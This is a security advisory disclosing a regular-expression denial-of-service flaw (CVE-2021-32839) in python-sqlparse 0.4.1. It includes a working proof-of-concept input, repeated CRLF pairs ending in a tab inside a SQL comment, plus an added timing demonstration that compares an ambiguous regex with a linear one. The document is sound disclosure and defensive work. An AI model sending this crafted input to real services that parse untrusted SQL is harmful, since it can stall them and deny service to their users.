September 23, 2021

GHSL-2021-107: ReDoS (Regular Expression Denial of Service) in python-sqlparse - CVE-2021-32839

Kevin Backhouse

Coordinated Disclosure Timeline

Summary

python-sqlparse contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

python-sqlparse

Tested Version

0.4.1

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on python-sqlparse by following this link.

Vulnerability

The vulnerable regular expression is here.

Run the following script to reproduce the issue:

import sqlparse

attack = '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t'

sql = 'select * from bar /* ' + attack + '*/'
res = sqlparse.format(sql, strip_comments=True)
print(res)
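
Why an input of this shape is expensive, shown as an added example that is not part of the original advisory or of python-sqlparse: the pattern `AMBIGUOUS` below is a constructed pattern (an assumption, not quoted from python-sqlparse's source) in which each `\r\n` can be consumed in two ways, and `LINEAR` is a rewrite that accepts the same line-break runs with only one way to match each character. The helper names are hypothetical.

```python
import re
import time

# Constructed pattern (assumption): "\r\n" matches either as the "\r\n" branch
# or as "\r" followed by "\n", so n CRLF pairs have 2**n decompositions.
AMBIGUOUS = re.compile(r'((\r\n|\r|\n)+) *$')
# Same set of accepted line-break runs, but each character matches one way only.
LINEAR = re.compile(r'([\r\n]+) *$')


def crafted(n):
    """n CRLF pairs plus a tab, the shape of the advisory's `attack` string."""
    return '\r\n' * n + '\t'


def seconds(pattern, text):
    """Wall-clock time of a single search."""
    start = time.perf_counter()
    pattern.search(text)
    return time.perf_counter() - start


def same_result(text):
    """True if both patterns capture the same trailing line-break run."""
    a, b = AMBIGUOUS.search(text), LINEAR.search(text)
    return (a and a.group(1)) == (b and b.group(1))


def growth(sizes=(10, 12, 14, 16)):
    """Return [(n, ambiguous_seconds, linear_seconds)] for crafted inputs."""
    return [(n, seconds(AMBIGUOUS, crafted(n)), seconds(LINEAR, crafted(n)))
            for n in sizes]


if __name__ == '__main__':
    # The trailing tab makes the final "$" fail, so the engine retries every
    # decomposition of the line breaks before giving up.
    for n, slow, fast in growth():
        print(f'n={n:2d}  ambiguous={slow:.4f}s  linear={fast:.6f}s')
```

The sizes are kept small so the script finishes quickly; the ambiguous timings roughly quadruple for every two extra CRLF pairs, while the linear ones stay negligible.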

Impact

This issue may lead to a denial of service.

CVE

CVE-2021-32839

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2021-107 in any communication regarding this issue.